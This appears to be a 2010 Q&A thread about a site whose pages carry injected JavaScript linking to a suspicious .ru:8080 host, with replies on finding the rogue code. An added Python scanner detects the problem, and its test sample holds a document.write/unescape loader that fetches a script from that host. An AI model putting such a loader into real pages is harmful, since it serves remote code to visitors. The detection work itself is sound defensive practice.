
There appears to be a virus on my site. It's been there for some time and I've had no problems as yet. AVG picks it up, but McAfee does not.

I run a website (sortitoutsi.net). Ages ago I got a virus on my computer, which got hold of my FTP passwords and added some lines of JavaScript to the top of my site.

I removed them and believe it was fixed. However, using the "Web Developer" extension for Firefox I found that the JavaScript on my page was pointing various links to such URLs as:

  • gittigidiyor-com.excite.co.jp.webmasterworld-com.eastmusicdirect.ru:8080/aboutus.org/aboutus.org/google.com/skycn.com/torrents.ru.php

  • gittigidiyor-com.excite.co.jp.webmasterworld-com.eastmusicdirect.ru:8080/index.php?jl=

These terms do not appear anywhere: not in the source code, in any of the JavaScript, or in the CSS. I also can't see any unrecognizable rogue images.

I have no idea where this JavaScript is coming from.

Can anyone suggest how I can find references to these links and remove them?

I can see them both in the Web Developer Firefox extension and in the net tab using Firebug.

Any help would be greatly appreciated.

  • Have you tried to clear the cache in your web browser?
    – Mikael S
    Commented Mar 14, 2010 at 21:15
  • Why was this question moved here, and not to serverfault.com? Commented Mar 14, 2010 at 22:00
  • @Jørn closing - which encompasses migration - is decided on a majority vote of 5 users. If there's a tie then the first vote wins.
    – ChrisF
    Commented Mar 15, 2010 at 9:04

2 Answers

I don't see how they could have a rootkit on the machine; after all, I have 20 sites on this machine and only one site has been affected.

I also don't see how this could let them output JavaScript on a page. Surely in order for the browser to download it, it has to be somewhere in the JavaScript and not an actual server issue.

Could you explain a little more why you think a complete clean machine would be necessary?

EDIT: I posted this question as a guest over at stackoverflow and it seems to have lost the fact that this is mine in the migration. I realise this is now messy but I can't respond to answers. If someone knows how to fix it please let me know.

  • Whenever a machine is compromised you shouldn't trust it. Rootkits are designed to be hidden, and if binaries were replaced they could hide processes doing nefarious things; if you have a trojaned ps, how can you use ps to figure out if you have another malware process running? Commented Mar 14, 2010 at 21:57
  • @Ssv - you only need the first three characters of the user's name for them to see a comment directed at them, and as this is Rob's answer anyway he'll see it anyway.
    – ChrisF
    Commented Mar 14, 2010 at 22:53
  • @Chr - Thanks! I didn't know the exact syntax. Where can I find this type of information about SuperUser?
    – ssvarc
    Commented Mar 15, 2010 at 1:29
  • Have a look at meta.stackoverflow.com where there is all sorts of interesting information about the trilogy ;-)
    – Ivo Flipse
    Commented Mar 15, 2010 at 6:10
  • @Ssv - as Ivo pointed out (but forgot to add your user id) check out meta.stackoverflow.com
    – ChrisF
    Commented Mar 15, 2010 at 9:01
Check the top and bottom of the http://sortitoutsi.net/template/js/general.js file ... it looks pretty suspicious to me.
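A way to automate the check the answer above suggests (an added example, not code from the question or either answer): scan the site's script files for references to hosts outside an allowlist, and for loader-style code at the head or tail of each file, since injected code is usually prepended or appended. The allowlist, the file extensions and the sample file contents are constructed for the demo.

```python
import re
from pathlib import Path

# Hosts the site is expected to reference (assumption for the demo; use your own list).
KNOWN_HOSTS = {"sortitoutsi.net"}
# Host of an absolute URL, optionally with a port, e.g. http://host.tld:8080/path
HOST_RE = re.compile(r"(?:https?:)?//([a-z0-9-]+(?:\.[a-z0-9-]+)+)(?::\d+)?", re.I)
# Constructs injected loaders lean on: eval/unescape/document.write, hex or %-escaped text.
SUSPECT_RE = re.compile(
    r"\b(?:eval|unescape|document\.write)\s*\(|\\x[0-9a-f]{2}|%[0-9a-f]{2}", re.I)


def scan_js(text, known_hosts=KNOWN_HOSTS, edge_lines=3, max_len=400):
    """Return findings as (kind, detail) tuples; an empty list means nothing stood out."""
    findings = []
    for host in sorted({h.lower() for h in HOST_RE.findall(text)}):
        if not any(host == k or host.endswith("." + k) for k in known_hosts):
            findings.append(("unknown-host", host))
    lines = text.splitlines()
    # Injected code is usually prepended or appended, so look hardest at both edges.
    head = range(min(edge_lines, len(lines)))
    tail = range(max(0, len(lines) - edge_lines), len(lines))
    for i in sorted(set(head) | set(tail)):
        if SUSPECT_RE.search(lines[i]) or len(lines[i]) > max_len:
            findings.append(("suspicious-edge-line", i + 1))  # 1-based line number
    return findings


def scan_tree(root, exts=(".js", ".html", ".php")):
    """Walk a web root and map each flagged file to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            hits = scan_js(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


# Constructed samples: a harmless helper file, and the same file with a loader appended.
CLEAN_JS = ("// site helpers\n"
            "function toggle(id){var e=document.getElementById(id);e.style.display='none';}\n")
INJECTED_JS = CLEAN_JS + ("document.write(unescape('%3Cscript src=\"http://eastmusicdirect.ru"
                          ":8080/index.php?jl=\"%3E%3C/script%3E'));\n")

if __name__ == "__main__":
    print("clean:", scan_js(CLEAN_JS))        # []
    print("injected:", scan_js(INJECTED_JS))  # flags the unknown host and line 3
```

Run `scan_tree("/path/to/webroot")` against a copy of the site to get a per-file report, then compare each flagged file against a known-good copy from version control or backup before editing it.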
